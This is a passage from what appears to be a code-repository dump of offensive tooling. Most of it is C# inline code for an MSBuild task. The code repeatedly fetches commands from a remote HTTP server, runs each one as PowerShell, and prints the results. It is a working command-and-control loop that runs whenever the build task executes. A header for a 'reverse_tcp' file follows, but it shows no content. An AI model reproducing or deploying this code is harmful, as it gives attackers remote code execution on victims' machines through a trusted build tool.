request.Headers.IfModifiedSince = lastUpdated; 39 | } 40 | var response = await client.SendAsync(request); 41 | if ((int)response.StatusCode == 200) 42 | { 43 | cmd = await response.Content.ReadAsStringAsync(); 44 | Console.ForegroundColor = ConsoleColor.Green; 45 | Console.WriteLine(cmd); 46 | Console.ForegroundColor = ConsoleColor.White; 47 | 48 | PowerShell ps = PowerShell.Create(); 49 | ps.Runspace = rs; 50 | ps.AddScript(cmd); 51 | 52 | var results = ps.Invoke(); 53 | foreach (var psObject in results) 54 | { 55 | Console.WriteLine(psObject.ToString()); 56 | } 57 | Collection errors = ps.Streams.Error.ReadAll(); 58 | 59 | if (errors != null && errors.Count > 0) 60 | { 61 | Console.ForegroundColor = ConsoleColor.Yellow; 62 | foreach (ErrorRecord er in errors) 63 | { 64 | Console.WriteLine(er.Exception.ToString()); 65 | } 66 | Console.ForegroundColor = ConsoleColor.White; 67 | } 68 | 69 | lastUpdated = DateTime.Now; 70 | } 71 | else if ((int)response.StatusCode == 404) 72 | { 73 | Console.WriteLine("$ Done, exiting..."); 74 | rs.Close(); 75 | return; 76 | } 77 | } 78 | System.Threading.Thread.Sleep(200); 79 | } 80 | } 81 | 82 | public override bool Execute() 83 | { 84 | Loop().Wait(); 85 | return true; 86 | } 87 | } 88 | ]]> 89 | 90 | 91 | 92 | 93 | -------------------------------------------------------------------------------- /xml/reverse_tcp.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 14 | 15 | 16 | 17 | 118 | 119 | 120 | 121 | 122 | --------------------------------------------------------------------------------